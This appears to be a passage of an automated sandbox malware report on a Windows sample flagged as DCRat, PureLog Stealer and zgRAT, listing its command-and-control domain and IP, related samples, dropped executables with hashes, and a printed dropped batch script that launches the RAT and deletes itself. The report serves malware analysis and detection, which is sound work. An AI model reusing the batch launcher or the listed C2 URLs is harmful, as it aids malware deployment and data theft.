                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://hvatit.top0%Avira URL Cloudsafe
                                    http://hvatit.top/dbwp.php100%Avira URL Cloudmalware
                                    http://hvatit.top/0%Avira URL Cloudsafe
                                    http://hvatit.top/dbwp.php0%VirustotalBrowse
                                    http://hvatit.top/0%VirustotalBrowse
                                    http://hvatit.top0%VirustotalBrowse

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    hvatit.top
                                    		80.211.144.156
                                    		truetrueunknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://hvatit.top/dbwp.phptrue
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://hvatit.topKSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameChainPortServerBrowsermonitor.exe, 00000004.00000002.1713284618.0000000003665000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://hvatit.top/KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmptrue
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    80.211.144.156
                                    		hvatit.topItaly
                                    		31034ARUBA-ASNITtrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1502155
                                    Start date and time:2024-08-31 09:31:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 46s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:cuAvoExY41.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:7DDACBFDACD9E8AEACD1B0F2DEA51F4E.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@18/28@1/1
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target KSFasOVYpBufeMshBMPdEDfTcvlm.exe, PID 7668 because it is empty
                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:32:12API Interceptor13787427x Sleep call for process: KSFasOVYpBufeMshBMPdEDfTcvlm.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    80.211.144.156rRNxo8cmA3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 222725cm.n9shka.top/vmjavascriptUpdateprotectlinuxWppublicTemp.php
                                    9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 334972cm.n9shka.top/PhpPacketlowProcessGameprotectprivatecentral.php
                                    i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • otkaz.top/PhpWordpress.php
                                    z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • mamka.top/phpjssecureCpuApilinuxWp.php
                                    4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php
                                    BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 426314cm.n9sh.top/vmupdateAuthsqlDbAsyncTrackDlecentralDownloads.php
                                    foIdlOzWvH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 921773cm.n9sh.top/providerExternalimageVideojsPacketprocessorDefaultDbLinux.php
                                    3O5Uh9S6wK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 951499cm.nyashtech.top/sqlcentralUploads.php
                                    trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 966193cm.n9shka.top/Multilinux.php
                                    bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 951499cm.nyashtech.top/PollGeoDbwordpressTemporary/722944f89091ce5d9b1c5fbdfd00568555f67a8aa399d5400d05a2a7b07fcbcd263346663ea3568b

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ARUBA-ASNITrRNxo8cmA3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Ftarmacaccdpt273942.s3.eu-west-2.amazonaws.com%2Ftarmacaccdpt273942.htm/1/010301919fd504bf-f1140bbf-5bf1-4efc-a5af-08f5427832cc-000000/_gNHUUKrZwooc5axkSOIwuxNPxE=174Get hashmaliciousHTMLPhisherBrowse
                                    • 89.46.108.56
                                    9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    bintoday1.exeGet hashmaliciousFormBookBrowse
                                    • 62.149.128.40
                                    Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
                                    • 62.149.156.218
                                    BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 80.211.144.156
                                    https://urlsand.esvalabs.com/?u=https%3A%2F%2Flinkin.bio%2Falbatros&e=606d87ee&h=dea68a16&f=y&p=yGet hashmaliciousHTMLPhisherBrowse
                                    • 95.110.136.136

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\Desktop\CUGzHwzy.logTwfUz3FuO7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      9i0GfIAfU7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          z3yAH0LL5e.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            4ra1Fo2Zql.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              BUKHuBek8M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                ugRGgCJhQl.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  eCGKhYZtgx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    czcgyt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      trkfmve.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                        Created / dropped Files

                                                        C:\Program Files\Microsoft Office 15\6bc8f6e50ab287

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):213
                                                        Entropy (8bit):5.726378981092223
                                                        Encrypted:false
                                                        SSDEEP:6:8mwaFiSM18rK/oWcoEwTXVYC5DryXIQSWWsndJ72bR0kon:xiSM1Z4oZT95OIwndcOko
                                                        MD5:A76D562AD4AF0DD866C56EBE9F280CC0
                                                        SHA1:BA60670D7BF1AC38E1790BCB39E8CF25A3DD09B3
                                                        SHA-256:39547031F6AC9015BDB08130D652F2E09CD17E8E069D4DC6AD3E7803C62123CA
                                                        SHA-512:4BAD21E9310881B514CE883BFCC863345A5D352B7586CF58113FE5FDC0E1335AE0A5C7AB3A5A7BED7816F63BD5DB376A9EE71613B260338332B4AD4693A05897
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:AJg6dGmc3RFgCJebngus6luTN4IcIM7f5aSPt2gjazdaiKfDlpjjUhQYZMsi8JUrUjll1PruAKSGHUvCZE0dnXKXK3zgK7lQfwF8j3MV7yjJPJQFbqJ4S0E6ZNb7aLkCjClVOwdf1fgyyBIBmuEdyr7orIjWcO5vNgjNh50pNoCxUPIXEaVqGGO2E6oFMGCnjukRb5dr3ZQJoJUbALRB3

                                                        C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        C:\Program Files\Windows Multimedia Platform\24dbde2999530e

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (604), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):604
                                                        Entropy (8bit):5.892231862694754
                                                        Encrypted:false
                                                        SSDEEP:12:9dNwvE46yoZpDheBIwUrsw5qnDSFBZk/oxFAsBAFaxB/XO4Ku13hhjWC7U:x746pheKwUQw5quDZkSAjie4KihRWC4
                                                        MD5:3B64FC34BD8DF5A1704F13D96B1083AE
                                                        SHA1:2DDB982438D24ACFA0C326A1DD8B96D7278282F8
                                                        SHA-256:883436888CC94B5A86A9AFD365AFDE61110FF0B3DCA7AF5235D895CE1663BAE2
                                                        SHA-512:BC279781682A980F2E4EEBACAE2659ED77C3DF795AA8D0E97B95EB4B42438C036901DA42B1325ED1D33AA219B51C354D59892F288A89E4DA647F65B950EB1A76
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:QvcGlYOkp05J7nwr0FN5mMFBzBtUFdAuw2aH6KiP5uwJPHEQc7QMdN9DqbQkp4eL0LXFMpvph791a5vr6d1HMxRi2Xbf37kAPkSEu9DxMlpfNHnvqinMCX8D4yMzNPwjX9mzmq77ZE4lIvVvtqyUUX71mPK5wOj6yGIOeyI9lpx8cX5IdaFhbbO9BuNWgBKLe8xBnGR5hztok9ZPUBcWIBfX1INtkvdjemeek3fWIKAmskYCV8CeiyCccZKe3hUvVJK8f5pbfGN8B3oRtKYmt8AqjBBKsBclzOQiaahZSk9ckDbjv3usIrCXJdYd4esenmJxnG1Tn9UJ9iGfkbYzQtcHM2Z6BDfx1ey84n6pCbEJX2YlX23cG3N3JBluq4RkdgRetIl6ftwzoSuTeyjIJCr8Q4y2CM8IJep1l31OR77WGYO1RRP2UIbbyTNyUs3SvopKm2rk6U1LEV12q6lu6FxADODSqD4iEokbsEPZkp59RPWcbVIXHIWp1oHYyZ42aSHZuZJlrMKRJxtx1k0V5hb5S5kE61kKuDj9H6sBLgq48EfD5TgOij630MHzzFp0l9gGOtq52zJZ1g6OZgImUVmLGqI4

                                                        C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        C:\Users\Public\Libraries\6bc8f6e50ab287

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (407), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):407
                                                        Entropy (8bit):5.842157912528132
                                                        Encrypted:false
                                                        SSDEEP:12:uB1PVE0q2SpQO2vRxM02bAxQvFwoCcXALCKqdUF+xU:unVM2SpQOWAPDWGALZF+m
                                                        MD5:F262ECC3D2C3B1C61768CCEBE130E31E
                                                        SHA1:E0BA980B42ABD33A895687BB3EABB793D9085C39
                                                        SHA-256:51E6DA0645F9BFFE66376DF48E1C9F96D0F5E458791EDD4D0E4BBB272A0B1013
                                                        SHA-512:2BDD61DECF399A17658739C0CFA56A63B1BD23EC03CD647EF50EAB5350A5E5AA73BF7DB8DA742440939DB40ABCF81A8BE6B8661849CF34371F6973ACE6926C98
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:zLnlVtahBTP3ZS6CfQXUAhlvF9mCiBN8qAr69t92vjozo6d3JyTClNYRk1fWGX8AFRMZkADwQejb3wGJgs2urLXdmaVHNnwXkotXtDTJuhwGn7XyvWzYfNS44twKo6imsL0PCtZcZsAKYQzoChW1xX2WVyc9RIfy9JYcGIvB6X8wNIfo4HHGkqyUSd4OQaLQNMKO2Wi4vU4aZGJMSyEJBYNSVDJmOhvgLsiA7RvijNUPvX5MUr5bVCPz813yM5pOjYPrhIPBCgjxD8h7I7RhmTLIctCGX7VniGqXIOoLc3YydbvAU6qPoIlPMGOyGInFL5P6RJy3SFFs5WpB7CvbQF9ZfbLBA0FTPTnhMysLHw7iC2UzbM0EXMzF6zb07x3bAwdmtIzITjUdIbWmHVkx9B5

                                                        C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainPortServerBrowsermonitor.exe.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1179
                                                        Entropy (8bit):5.354252320228764
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                        MD5:074445AD437DEED8A22F11A846280CE2
                                                        SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                        SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                        SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                        C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):193
                                                        Entropy (8bit):5.334792111535732
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DEmICg/EII5eZNHyKOZG1wkn23feQQdn:CuVEOCDEIYWfWFdn
                                                        MD5:3AF77CECEB99E6684F53483DDDC85B08
                                                        SHA1:9B54746742F134F5B65A5F51E4D61966E238379F
                                                        SHA-256:16AA034A0ADDD6B9B24518636FB922DFE20B26E0A7F6163F96315FCEB8127ACC
                                                        SHA-512:477404110233B6B84EDADA09C417F008F9B0484ACEE47D13013172903882BA2D4BE7D0C27682932DC55F616CCA7C9E9C55085A99F9D8DC7057614DA146624EF6
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KhSi255NBg.bat"

                                                        C:\Users\user\AppData\Local\Temp\LiXPpMYSA8

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.323856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:Ae2LfpHTn:ShHT
                                                        MD5:0DD1AFD911C344032B6703C6BBD0BB5A
                                                        SHA1:A07A04670473A7AAAD21F252BFA7A9AE1F15A1F2
                                                        SHA-256:9F1BE71400F5FF487110CF2F51970DC1645D1B46691D07DD65DFF04F9464660D
                                                        SHA-512:B5CE3EF80728FD30EA814133284B4C4CCF08F93CBEC45E2584973810844B51587A7133D759181F184578706FB26D8922D03244F5A015423D217E5CF554D7245E
                                                        Malicious:false
                                                        Preview:lkW8Dx4uLUWI0ynNnaeuTAPCA

                                                        C:\Users\user\Desktop\CUGzHwzy.log

                                                        Download File
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        • Antivirus: Virustotal, Detection: 29%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                                        • Filename: 9i0GfIAfU7.exe, Detection: malicious, Browse
                                                        • Filename: i3F8zuP3u9.exe, Detection: malicious, Browse
                                                        • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                                        • Filename: 4ra1Fo2Zql.exe, Detection: malicious, Browse
                                                        • Filename: BUKHuBek8M.exe, Detection: malicious, Browse
                                                        • Filename: ugRGgCJhQl.exe, Detection: malicious, Browse
                                                        • Filename: eCGKhYZtgx.exe, Detection: malicious, Browse
                                                        • Filename: czcgyt.exe, Detection: malicious, Browse
                                                        • Filename: trkfmve.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\EQOQCKPT.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        • Antivirus: Virustotal, Detection: 69%, Browse
